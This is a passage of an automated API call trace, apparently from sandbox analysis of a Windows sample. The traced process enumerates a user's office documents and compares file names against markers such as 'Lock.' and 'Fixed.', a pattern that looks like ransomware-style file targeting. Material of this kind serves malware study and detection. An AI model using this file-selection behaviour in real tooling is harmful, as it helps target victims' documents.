ftLastAccessTime.dwLowDateTime=0x61144ac0, ftLastAccessTime.dwHighDateTime=0x1d4d565, ftLastWriteTime.dwLowDateTime=0x61144ac0, ftLastWriteTime.dwHighDateTime=0x1d4d565, nFileSizeHigh=0x0, nFileSizeLow=0x14908, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="MzqysNw1q1np8jj.docx", cAlternateFileName="MZQYSN~1.DOC")) returned 1 [0259.146] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a565b20, ftCreationTime.dwHighDateTime=0x1d4cd29, ftLastAccessTime.dwLowDateTime=0xb5d49130, ftLastAccessTime.dwHighDateTime=0x1d4c95f, ftLastWriteTime.dwLowDateTime=0xb5d49130, ftLastWriteTime.dwHighDateTime=0x1d4c95f, nFileSizeHigh=0x0, nFileSizeLow=0x2a8f, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="oh6dPV4.xlsx", cAlternateFileName="OH6DPV~1.XLS")) returned 1 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9671e0f0, ftCreationTime.dwHighDateTime=0x1d4c553, ftLastAccessTime.dwLowDateTime=0x91baf540, ftLastAccessTime.dwHighDateTime=0x1d4cd7a, ftLastWriteTime.dwLowDateTime=0x91baf540, ftLastWriteTime.dwHighDateTime=0x1d4cd7a, nFileSizeHigh=0x0, nFileSizeLow=0x11ca6, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="OQOxXrKa.ods", cAlternateFileName="")) returned 1 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.147] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd1de0, ftCreationTime.dwHighDateTime=0x1d4d40f, ftLastAccessTime.dwLowDateTime=0xcf36a910, ftLastAccessTime.dwHighDateTime=0x1d4cdce, ftLastWriteTime.dwLowDateTime=0xcf36a910, ftLastWriteTime.dwHighDateTime=0x1d4cdce, nFileSizeHigh=0x0, nFileSizeLow=0x71c1, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="rq5tKC1of8p4r7HR.pps", cAlternateFileName="RQ5TKC~1.PPS")) returned 1 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.148] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d5280d0, ftCreationTime.dwHighDateTime=0x1d4e9af, ftLastAccessTime.dwLowDateTime=0x3af8fd50, ftLastAccessTime.dwHighDateTime=0x1d4e5b3, ftLastWriteTime.dwLowDateTime=0x3af8fd50, ftLastWriteTime.dwHighDateTime=0x1d4e5b3, nFileSizeHigh=0x0, nFileSizeLow=0x44ea, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="XeFrXnKCfR10wVvY0.pptx", cAlternateFileName="XEFRXN~1.PPT")) returned 1 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc815a370, ftCreationTime.dwHighDateTime=0x1d4d4fe, ftLastAccessTime.dwLowDateTime=0x30e7af10, ftLastAccessTime.dwHighDateTime=0x1d4b63c, ftLastWriteTime.dwLowDateTime=0x30e7af10, ftLastWriteTime.dwHighDateTime=0x1d4b63c, nFileSizeHigh=0x0, nFileSizeLow=0x174d9, dwReserved0=0x34aa550, dwReserved1=0x25c6e50, cFileName="ZeVUVJRj4YhmoN71.pptx", cAlternateFileName="ZEVUVJ~1.PPT")) returned 1 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.149] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x432bb3c0, ftCreationTime.dwHighDateTime=0x1d4c59a, ftLastAccessTime.dwLowDateTime=0x748bcd30, ftLastAccessTime.dwHighDateTime=0x1d4c705, ftLastWriteTime.dwLowDateTime=0x748bcd30, ftLastWriteTime.dwHighDateTime=0x1d4c705, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x34aaa00, dwReserved1=0x25c6e50, cFileName="Zq0bBrnPbhA3GBBLi8", cAlternateFileName="ZQ0BBR~1")) returned 1 [0259.149] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.150] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.150] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.150] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.150] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.150] FindNextFileW (in: hFindFile=0xaa57a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b1898, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d790, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x34aa4a8, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\xd1af\x01\xff78\x8b\x1ecd\x771a\x25b9\x34\xfffe\xffff\xe36c\x7715\xe0d2\x7715\x9870\x24a\xa550\x34a\x10", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0259.150] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.150] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.150] FindClose (in: hFindFile=0xaa57a0 | out: hFindFile=0xaa57a0) returned 1 [0259.151] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.151] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.151] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.151] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.151] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1fyOaNMvpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fyOaNMvpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yOaNMvpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OaNMvpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aNMvpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NMvpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mvpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vpe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pe0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.151] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LFYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FYMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YMO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MO.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O.doc", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0259.152] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1fyOaNMvpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fyOaNMvpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yOaNMvpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OaNMvpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aNMvpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NMvpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mvpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vpe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pe0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0259.152] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LFYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FYMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YMO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.153] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MO.doc", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0259.153] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0259.153] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0259.153] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.153] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0259.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.153] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0259.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.153] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0259.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0259.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0259.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0259.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0259.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0259.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0259.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.155] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0259.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0259.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0259.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0259.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0259.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0259.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0259.156] RtlAllocateHeap 